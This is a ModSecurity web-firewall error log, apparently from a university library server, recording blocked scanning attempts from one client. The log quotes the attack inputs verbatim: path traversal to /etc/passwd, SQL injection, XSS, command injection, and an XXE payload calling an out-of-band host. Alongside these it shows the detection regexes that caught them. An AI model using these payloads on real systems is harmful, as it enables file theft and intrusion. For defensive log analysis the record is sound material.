[Tue Aug 29 11:41:00.400697 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file_name: ../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/webui/"] [unique_id "ZO123MCo-f0AAAcsLCwAAAAE"]
[Tue Aug 29 11:41:01.588728 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:UPusername. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:UPusername: \\x22><script>javascript:alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/MUP/"] [unique_id "ZO123cCo-f0AAAaZ9l8AAAAo"]
[Tue Aug 29 11:41:01.604568 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO123cCo-f0AAAcbSCMAAAAv"]
[Tue Aug 29 11:41:01.660427 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sidebar. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:sidebar: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/default/en_US/frame.A100.html"] [unique_id "ZO123cCo-f0AAAYMWUEAAAAR"]
[Tue Aug 29 11:41:03.564446 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:firstname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:firstname: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO1238Co-f0AAAYMWUQAAAAR"]
[Tue Aug 29 11:41:03.581154 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/searchblox/servlet/FileServlet"] [unique_id "ZO1238Co-f0AAAcvBd4AAAAJ"]
[Tue Aug 29 11:41:04.404462 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:userPage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:userPage: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "digilibfkip.unla.ac.id"] [uri "/CFIDE/debug/cf_debugFr.cfm"] [unique_id "ZO124MCo-f0AAActbG8AAAAH"]
[Tue Aug 29 11:41:04.432530 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cat_id: ${system(cat/etc/passwd)}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/infusions/downloads/downloads.php"] [unique_id "ZO124MCo-f0AAActbHAAAAAH"]
[Tue Aug 29 11:41:05.407128 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/catalog.php"] [unique_id "ZO124cCo-f0AAAcYU9UAAAAp"]
[Tue Aug 29 11:41:05.470433 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:userPage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:userPage: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "digilibfkip.unla.ac.id"] [uri "/cfusion/debug/cf_debugFr.cfm"] [unique_id "ZO124cCo-f0AAAYf-NUAAAAD"]
[Tue Aug 29 11:41:05.511375 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:s_Language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:s_Language: ../../../../../../../../../../../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/language/lang"] [unique_id "ZO124cCo-f0AAAYf-NcAAAAD"]
[Tue Aug 29 11:41:05.511998 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"https://rfi.nessus.org/rfi.txt"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS_NAMES:{\\x22Type\\x22:\\x22SubscriptionConfirmation\\x22,\\x22Message\\x22:\\x22\\x22,\\x22SubscribeURL\\x22:\\x22https://rfi.nessus.org/rfi.txt\\x22}: {\\x22Type\\x22:\\x22SubscriptionConfirmation\\x22,\\x22Message\\x22:\\x22\\x22,\\x22SubscribeURL\\x22:\\x22https://rfi.nessus.org/rfi.txt\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/w3-total-cache/pub/sns.php"] [unique_id "ZO124cCo-f0AAAcoNPgAAAAF"]
[Tue Aug 29 11:41:07.854646 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:wp_abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:wp_abspath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/simple-fields/simple_fields.php"] [unique_id "ZO1248Co-f0AAAcoNQsAAAAF"]
[Tue Aug 29 11:41:09.143004 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:sponsor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:sponsor: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.dhtml"] [unique_id "ZO125cCo-f0AAAcYU-0AAAAp"]
[Tue Aug 29 11:41:09.650690 2023] [:error] [pid 1847] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO125cCo-f0AAAc36swAAAAO"]
[Tue Aug 29 11:41:10.377192 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:email: 2UdyWmaXpTq91nUrOZ0geHP3XoU@test.com' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO125sCo-f0AAAaZ9nQAAAAo"]
[Tue Aug 29 11:41:10.484572 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:csftyp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:csftyp: classic ssfile1=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/cgi-bin/broker"] [unique_id "ZO125sCo-f0AAAc4EjcAAAAP"]
[Tue Aug 29 11:41:13.379410 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:certfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:certfile: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/admin/cert_download.php"] [unique_id "ZO126cCo-f0AAAc4EkYAAAAP"]
[Tue Aug 29 11:41:15.479513 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:previewFilePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:previewFilePath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/analytics/saw.dll"] [unique_id "ZO1268Co-f0AAAc2dPgAAAAN"]
[Tue Aug 29 11:41:18.650093 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -6' union select 1,md5('999999999'),3,4,5,6,7,8,9,10,11-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/admin/"] [unique_id "ZO127sCo-f0AAAc4EmAAAAAP"]
[Tue Aug 29 11:41:18.657216 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/register/toDownload.do"] [unique_id "ZO127sCo-f0AAAaZ9qYAAAAo"]
[Tue Aug 29 11:41:19.371966 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:err. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:err: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO1278Co-f0AAAcqJMEAAAAG"]
[Tue Aug 29 11:41:19.439905 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/register/toDownload.do"] [unique_id "ZO1278Co-f0AAAc4EmUAAAAP"]
[Tue Aug 29 11:41:19.486893 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:filename: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/ACSServer/WebServlet"] [unique_id "ZO1278Co-f0AAAYf-RAAAAAD"]
[Tue Aug 29 11:41:20.397307 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/compress.php"] [unique_id "ZO128MCo-f0AAAaZ9q0AAAAo"]
[Tue Aug 29 11:41:20.440836 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://test found within TX:1: test"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/oauth/authorize"] [unique_id "ZO128MCo-f0AAAc0NdIAAAAM"]
[Tue Aug 29 11:41:20.755563 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:filename: ../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/ACSServer/WebServlet"] [unique_id "ZO128MCo-f0AAAc0NdsAAAAM"]
[Tue Aug 29 11:41:20.796545 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:login: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO128MCo-f0AAAc0Nd0AAAAM"]
[Tue Aug 29 11:41:22.043910 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:xml. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22 ?><! found within ARGS:xml: <?xml version=\\x221.0\\x22 ?><!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY % sp SYSTEM \\x22http://cjmnbitjmimt14dgn26gt6pynj4rkje7x.oast.site/xxe.xml\\x22>%sp;%param1;]>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/xmlpserver/convert"] [unique_id "ZO128sCo-f0AAAcqJNsAAAAG"]
[Tue Aug 29 11:41:22.503290 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:plugins[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:plugins[]: ../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/src/redirect.php"] [unique_id "ZO128sCo-f0AAAc2dRAAAAAN"]
[Tue Aug 29 11:41:23.360488 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.live found within TX:1: oast.live"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/api/v1/core/proxy/jsonprequest"] [unique_id "ZO1288Co-f0AAActbMAAAAAH"]
